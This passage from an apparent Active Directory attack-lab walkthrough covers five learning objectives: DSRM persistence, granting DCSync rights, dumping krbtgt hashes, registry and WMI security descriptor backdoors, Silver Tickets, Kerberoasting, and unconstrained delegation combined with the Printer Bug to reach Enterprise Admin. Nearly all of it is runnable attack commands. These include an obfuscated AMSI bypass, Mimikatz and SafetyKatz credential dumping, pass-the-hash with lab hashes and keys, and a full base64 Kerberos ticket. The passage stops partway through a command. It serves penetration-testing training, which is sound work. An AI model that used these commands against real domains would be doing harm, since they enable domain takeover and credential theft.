1445 | 1446 | 1447 | 1448 | 1449 | ### **Abusing the DSRM credential for persistence.** 1450 | 1451 | 1452 | 1453 | > [!bug] **Learning Objective 11** 1454 | > - During additional lab time: 1455 | > - Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence. 1456 | > # Solution -: 1457 | 1458 | 1459 | 1460 | 1461 | 1462 | **Note that we need Domain Admin privileges to do this, So go ahead and spawn an elevated shell and run this to obtain a new `MS-DOS` session with domain admin privileges** -: 1463 | 1464 | 1465 | ```powershell 1466 | C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 1467 | ``` 1468 | 1469 | - run the following commands on the new `MS-DOS` session to open a PowerShell remoting session 1470 | 1471 | ```powershell 1472 | # load invisi-shell 1473 | powershell 1474 | cd \AD\Tools 1475 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 1476 | 1477 | # load PS Remoting 1478 | $sess = New-PSSession dcorp-dc 1479 | Enter-PSSession -Session $sess 1480 | 1481 | # load amsi bypass 1482 | S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) 1483 | 1484 | # Exit session 1485 | exit 1486 | ``` 1487 | 1488 | 1489 | 1490 | 1491 | - Load the Invoke-Mimi script in the current session 1492 | 1493 | 1494 | ```powershell 1495 | Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess 1496 | ``` 1497 | 1498 | 1499 | 1500 | - Extract credentials from the SAM file from the DC. **The Directory Services Restore Mode** (DSRM) password is mapped to the local **Administrator** on the DC 1501 | 1502 | 1503 | ```powershell 1504 | # Connect to DC 1505 | Enter-PSSession -Session $sess 1506 | 1507 | # Extract Creds 1508 | Invoke-Mimi -Command '"token::elevate" "lsadump::sam"' 1509 | 1510 | # Important Output - 1511 | # User: 1512 | # Hash NTLM: 1513 | ``` 1514 | 1515 | 1516 | - change the logon behavior for the DSRM account 1517 | 1518 | 1519 | ```powershell 1520 | New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD 1521 | 1522 | exit 1523 | ``` 1524 | 1525 | 1526 | - Pass the Hash for the **DSRM** administrator 1527 | 1528 | ```powershell 1529 | . .\Invoke-Mimi.ps1 1530 | 1531 | Invoke-Mimi -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"' 1532 | ``` 1533 | 1534 | - We can now access the `dcorp-dc` directly from the new session. 1535 | 1536 | 1537 | ```powershell 1538 | ls \\dcorp-dc.dollarcorp.moneycorp.local\c$ 1539 | ``` 1540 | 1541 | 1542 | ![](https://i.imgur.com/IRluJRE.png) 1543 | 1544 | 1545 | 1546 | ### **Enumerating Replication (DCSync) rights** 1547 | 1548 | 1549 | > [!bug] **Learning Objective 12** 1550 | > - Check if studentx has Replication (DCSync) rights. 1551 | > - If yes, execute the DCSync attack to pull hashes of the krbtgt user. 1552 | > - If no, add the replication rights for the studentx and execute the DCSync attack to pull hashes of the krbtgt user. 1553 | > # Solution -: 1554 | 1555 | 1556 | 1557 | - Check if `studentx` has replication rights (Run from an elevated command prompt) - 1558 | 1559 | ```powershell 1560 | # Load invisi-shell 1561 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 1562 | 1563 | # Load Powerview 1564 | . C:\AD\Tools\PowerView.ps1 1565 | 1566 | # check rights 1567 | Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentx"} 1568 | ``` 1569 | 1570 | > If you probably don't get any output then you don't have replication rights, we can go ahead and add them by ourself 1571 | 1572 | 1573 | - Start a process as Domain Administrator (Run from an elevated command prompt) 1574 | 1575 | ```powershell 1576 | C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 1577 | ``` 1578 | 1579 | 1580 | - Run the below commands in the new process. Remember to change `studentx` to your user 1581 | 1582 | 1583 | ```powershell 1584 | # Load invisi-shell 1585 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 1586 | 1587 | # Load powerview 1588 | . C:\AD\Tools\PowerView.ps1 1589 | 1590 | # Add rights 1591 | Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity studentx -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose 1592 | ``` 1593 | 1594 | 1595 | ![](https://i.imgur.com/ypwVnJz.png) 1596 | 1597 | - Let’s check for the rights once again from a normal shell 1598 | 1599 | ```powershell 1600 | # Load invisi-shell 1601 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 1602 | 1603 | # Load Powerview 1604 | . C:\AD\Tools\PowerView.ps1 1605 | 1606 | # check rights 1607 | Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentx"} 1608 | ``` 1609 | 1610 | 1611 | - Your Output should look like this 1612 | 1613 | 1614 | ```powershell 1615 | AceQualifier : AccessAllowed 1616 | ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local 1617 | ActiveDirectoryRights : ExtendedRight 1618 | ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set 1619 | ObjectSID : S-1-5-21-719815819-3726368948-3917688648 1620 | InheritanceFlags : None 1621 | BinaryLength : 56 1622 | AceType : AccessAllowedObject 1623 | ObjectAceFlags : ObjectAceTypePresent 1624 | IsCallback : False 1625 | PropagationFlags : None 1626 | SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-4105 1627 | AccessMask : 256 1628 | AuditFlags : None 1629 | IsInherited : False 1630 | AceFlags : None 1631 | InheritedObjectAceType : All 1632 | OpaqueLength : 0 1633 | IdentityName : dcorp\student505 1634 | 1635 | AceQualifier : AccessAllowed 1636 | ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local 1637 | ActiveDirectoryRights : ExtendedRight 1638 | ObjectAceType : DS-Replication-Get-Changes 1639 | ObjectSID : S-1-5-21-719815819-3726368948-3917688648 1640 | InheritanceFlags : None 1641 | BinaryLength : 56 1642 | AceType : AccessAllowedObject 1643 | ObjectAceFlags : ObjectAceTypePresent 1644 | IsCallback : False 1645 | PropagationFlags : None 1646 | SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-4105 1647 | AccessMask : 256 1648 | AuditFlags : None 1649 | IsInherited : False 1650 | AceFlags : None 1651 | InheritedObjectAceType : All 1652 | OpaqueLength : 0 1653 | IdentityName : dcorp\student505 1654 | 1655 | AceQualifier : AccessAllowed 1656 | ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local 1657 | ActiveDirectoryRights : ExtendedRight 1658 | ObjectAceType : DS-Replication-Get-Changes-All 1659 | ObjectSID : S-1-5-21-719815819-3726368948-3917688648 1660 | InheritanceFlags : None 1661 | BinaryLength : 56 1662 | AceType : AccessAllowedObject 1663 | ObjectAceFlags : ObjectAceTypePresent 1664 | IsCallback : False 1665 | PropagationFlags : None 1666 | SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-4105 1667 | AccessMask : 256 1668 | AuditFlags : None 1669 | IsInherited : False 1670 | AceFlags : None 1671 | InheritedObjectAceType : All 1672 | OpaqueLength : 0 1673 | IdentityName : dcorp\student505 1674 | ``` 1675 | 1676 | 1677 | 1678 | - Sweet! Now, below command (or any similar tool) can be used as `studentx` to get the hashes of krbtgt user or any other user, (Run from an elevated command prompt) 1679 | 1680 | 1681 | ```powershell 1682 | C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit" 1683 | ``` 1684 | 1685 | 1686 | 1687 | > [!bug] **Learning Objective 13** 1688 | > - Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access. 1689 | > - Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI. 1690 | > # Solution -: 1691 | 1692 | 1693 | ### **PowerShell Remoting and WMI Access via Security Descriptor Modification on dcorp-dc** 1694 | 1695 | 1696 | **Once we have administrative privileges on a machine, we can modify security descriptors of services to access the services without administrative privileges. Below command (to be run as Domain Administrator) modifies the host security descriptors for `WMI` on the DC to allow `studentx` access to `WMI`** 1697 | 1698 | - Start a process as domain admin 1699 | 1700 | ```powershell 1701 | C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 1702 | ``` 1703 | 1704 | 1705 | - On the new spawned process run this 1706 | 1707 | 1708 | ```powershell 1709 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 1710 | 1711 | . C:\AD\Tools\RACE.ps1 1712 | 1713 | # Modify security descriptor 1714 | Set-RemoteWMI -SamAccountName studentx -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose 1715 | ``` 1716 | 1717 | 1718 | 1719 | - Now, we can execute `WMI` queries on the DC as `studentx` (spawn a new powershell process) - 1720 | 1721 | ```powershell 1722 | powershell 1723 | 1724 | gwmi -class win32_operatingsystem -ComputerName dcorp-dc 1725 | ``` 1726 | 1727 | 1728 | ![](https://i.imgur.com/FmYDwF2.png) 1729 | 1730 | 1731 | 1732 | ### **Silver Ticket Attack via Machine Account Hash in dcorp-dc** 1733 | 1734 | 1735 | - Start a process as domain admin 1736 | 1737 | ```powershell 1738 | C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 1739 | ``` 1740 | 1741 | 1742 | - To retrieve machine account hash without DA, first we need to modify permissions on the DC. On the new spawned process run this -: 1743 | 1744 | 1745 | ```powershell 1746 | powershell 1747 | 1748 | . C:\AD\Tools\RACE.ps1 1749 | 1750 | # retrieve machine account hash 1751 | Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee studentx -Verbose 1752 | ``` 1753 | 1754 | 1755 | ![](https://i.imgur.com/83LGb7O.png) 1756 | 1757 | 1758 | 1759 | - Now, we can retrieve hash as `studentx` (Spawn a new powershell process) - 1760 | 1761 | 1762 | ```powershell 1763 | . C:\AD\Tools\RACE.ps1 1764 | 1765 | Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose 1766 | ``` 1767 | 1768 | 1769 | ![](https://i.imgur.com/uHQje6w.png) 1770 | 1771 | 1772 | **We can then generate Silver Tickets for HOST and RPCSS with the machine account hash, enabling WMI query execution** 1773 | 1774 | 1775 | ```powershell 1776 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:f5a2cef076a16742b123b8ed07c372c1 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" 1777 | ``` 1778 | 1779 | 1780 | ```powershell 1781 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:f5a2cef076a16742b123b8ed07c372c1 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" 1782 | ``` 1783 | 1784 | 1785 | - Run the below command for `WMI` query execution 1786 | 1787 | 1788 | ```powershell 1789 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 1790 | 1791 | gwmi -Class win32_operatingsystem -ComputerName dcorp-dc 1792 | ``` 1793 | 1794 | 1795 | ![](https://i.imgur.com/JU363Qh.png) 1796 | 1797 | 1798 | 1799 | # **Domain Privilege Escalation** 1800 | 1801 | > [!bug] Learning Objective 14 1802 | > - Using the Kerberoast attack, crack password of a SQL server service account. 1803 | ># Solution -: 1804 | 1805 | ### **Kerberoast Attack - Crack SQL Server Service Account Password** 1806 | 1807 | 1808 | - Identify Services Running with User Accounts for Easier Password Cracking using `PowerView` - 1809 | 1810 | ```powershell 1811 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 1812 | 1813 | . C:\AD\Tools\PowerView.ps1 1814 | 1815 | Get-DomainUser -SPN 1816 | 1817 | # Important Output -: 1818 | # samaccountname 1819 | # serviceprincipalname 1820 | ``` 1821 | 1822 | 1823 | ![](https://i.imgur.com/yi9qbOd.png) 1824 | 1825 | 1826 | 1827 | **Neat! The `svcadmin`, which is a domain administrator has a SPN set! Let's Kerberoast it!** 1828 | 1829 | 1830 | - Retrieve Hashes for `svcadmin` Account with `Rubeus`, Focusing on **RC4**-Supported Accounts to Bypass AES Encryption (Run Command from elevated prompt) 1831 | 1832 | 1833 | ```powershell 1834 | C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt 1835 | ``` 1836 | 1837 | 1838 | ![](https://i.imgur.com/JHhSzlr.png) 1839 | 1840 | 1841 | 1842 | 1843 | > **You should now have your hashes written to `C:\AD\Tools\hashes.txt`, We can now use John the Ripper to brute-force the hashes. Please note that you need to remove "`:1433`" from the SPN in `hashes.txt` before running John** 1844 | 1845 | 1846 | 1847 | 1848 | ![](https://i.imgur.com/uxUMZQg.png) 1849 | 1850 | 1851 | - We can then run the below command after making above changes -: 1852 | 1853 | 1854 | ```powershell 1855 | C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt 1856 | ``` 1857 | 1858 | 1859 | ![](https://i.imgur.com/VsPwFaB.png) 1860 | 1861 | 1862 | 1863 | > [!bug] Learning Objective 15 1864 | > - Find a server in the dcorp domain where Unconstrained Delegation is enabled. 1865 | > - Compromise the server and escalate to Domain Admin privileges. 1866 | > - Escalate to Enterprise Admins privileges by abusing Printer Bug! 1867 | > # Solution -: 1868 | 1869 | 1870 | 1871 | 1872 | ### **Locate `dcorp` Domain Server with Unconstrained Delegation Enabled.** 1873 | 1874 | 1875 | - Find server with unconstrained delegation 1876 | 1877 | 1878 | ```powershell 1879 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 1880 | 1881 | . C:\AD\Tools\PowerView.ps1 1882 | 1883 | Get-DomainComputer -Unconstrained | select -ExpandProperty name 1884 | ``` 1885 | 1886 | 1887 | ![](https://i.imgur.com/X1AveOc.png) 1888 | 1889 | 1890 | > **Since the prerequisite for elevation using Unconstrained delegation is having admin access to the machine, we need to compromise a user which has local admin access on `appsrv`. Recall that we extracted secrets of `appadmin`, `srvadmin` and `websvc` from `dcorp-adminsrv`. Let’s check if anyone of them have local admin privileges on `dcorp-appsrv`.** 1891 | 1892 | 1893 | 1894 | 1895 | - First, we will try with `appadmin`. Run the below command from an elevated command prompt -: 1896 | 1897 | 1898 | ```powershell 1899 | C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth /user:appadmin /domain:dollarcorp.moneycorp.local /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /run:cmd.exe" "exit" 1900 | ``` 1901 | 1902 | 1903 | - Run the below commands in the new process: 1904 | 1905 | 1906 | ```powershell 1907 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 1908 | 1909 | . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1 1910 | 1911 | Find-PSRemotingLocalAdminAccess 1912 | ``` 1913 | 1914 | 1915 | 1916 | ![](https://i.imgur.com/vsiDSok.png) 1917 | 1918 | 1919 | 1920 | ### **Exploit Printer Bug for Escalation to Enterprise Admins Privileges** 1921 | 1922 | 1923 | 1924 | - Run the below command from the new process running `appadmin` -: 1925 | 1926 | ```powershell 1927 | echo F | xcopy C:\AD\Tools\Rubeus.exe \\dcorp-appsrv\C$\Users\Public\Rubeus.exe /Y 1928 | ``` 1929 | 1930 | 1931 | ![](https://i.imgur.com/6ZZeoLg.png) 1932 | 1933 | 1934 | - Run `Rubeus` in listener mode 1935 | 1936 | ```powershell 1937 | winrs -r:dcorp-appsrv cmd 1938 | 1939 | 1940 | C:\Users\Public\Rubeus.exe monitor /targetuser:DCORP-DC$ /interval:5 /nowrap 1941 | ``` 1942 | 1943 | 1944 | - Force Authentication from` dcorp-dc$` on Student VM Using MS-RPRN. (make sure to start up a new process on your student machine) 1945 | 1946 | 1947 | ```powershell 1948 | C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local 1949 | ``` 1950 | 1951 | 1952 | ![](https://i.imgur.com/IKPDwpG.png) 1953 | 1954 | 1955 | - On the `Rubeus` listener, we can see the TGT of `dcorp-dc$` (Output): 1956 | 1957 | 1958 | ``` 1959 | # Important Output 1960 | # User : 1961 | # Base64EncodedTicket : 1962 | 1963 | 1964 | [*] Monitoring every 5 seconds for new TGTs 1965 | 1966 | 1967 | [*] 12/18/2023 9:34:26 PM UTC - Found new TGT: 1968 | 1969 | User : DCORP-DC$@DOLLARCORP.MONEYCORP.LOCAL 1970 | StartTime : 12/18/2023 5:51:15 AM 1971 | EndTime : 12/18/2023 3:51:15 PM 1972 | RenewTill : 12/24/2023 8:17:13 PM 1973 | Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable 1974 | Base64EncodedTicket : 1975 | 1976 | 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 1977 | 1978 | [*] Ticket cache size: 1 1979 | ``` 1980 | 1981 | 1982 | 1983 | ![](https://i.imgur.com/xfekzWb.png) 1984 | 1985 | 1986 | 1987 | - Copy the base64 encoded ticket and Use Rubeus with Base64 Encoded Ticket on Student VM for SafetyKatz DCSync Command (Run the below command from an elevated prompt) -: 1988 | 1989 | 1990 | ```powershell 1991 | # C:\AD\Tools\Rubeus.exe ptt /ticket: 1992 | # Example -: 1993 | 1994 | 1995 | C:\AD\Tools\Rubeus.exe ptt /ticket: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 1996 | ``` 1997 | 1998 | 1999 | ![](https://i.imgur.com/BT3kcjj.png) 2000 | 2001 | 2002 | 2003 | - Now, we can run `DCSync` from this process: 2004 | 2005 | 2006 | ```powershell 2007 | C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit" 2008 | ``` 2009 | 2010 | 2011 | ### **Escalation to Enterprise Admins** 2012 | 2013 | - To get Enterprise Admin privileges, we need to force authentication from `mcorp-dc`. Run the below command to listen for `mcorp-dc$` tickets on `dcorp-appsrv`: 2014 | 2015 | ```powershell 2016 | winrs -r:dcorp-appsrv cmd 2017 | 2018 | C:\Users\Public\Rubeus.exe monitor /targetuser:MCORP-DC$ /interval:5 /nowrap 2019 | ``` 2020 | 2021 | > **Note -:** Incase you get "access is denied", you are probably running in the wrong shell, so just terminate the `Rubeus` listener we created then and run in that process 2022 | 2023 | 2024 | 2025 | ![](https://i.imgur.com/NhLQfn8.png) 2026 | 2027 | 2028 | 2029 | - Use `MS-RPRN` on the student VM to trigger authentication from `mcorp-dc` to `dcorp-appsrv`: 2030 | 2031 | 2032 | ```powershell 2033 | C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local 2034 | 2035 | # Expected Output - 2036 | RpcRemoteFindFirstPrinterChangeNotificationEx failed.Error Code 1722 - The RPC server is unavailable. 2037 | ``` 2038 | 2039 | - Now check your `Rubeus` output and you should see the **Base64EncodedTicket** 2040 | - Utilize `Rubeus` with **Base64 Encoded Ticket** on Student VM to Execute Elevated `SafetyKatz` DCSync Command. (Rub below command from elevated shell) 2041 | 2042 | 2043 | ```powershell 2044 | # C:\AD\Tools\Rubeus.exe ptt /ticket: 2045 | # Example -: 2046 | 2047 | 2048 | C:\AD\Tools\Rubeus.exe ptt 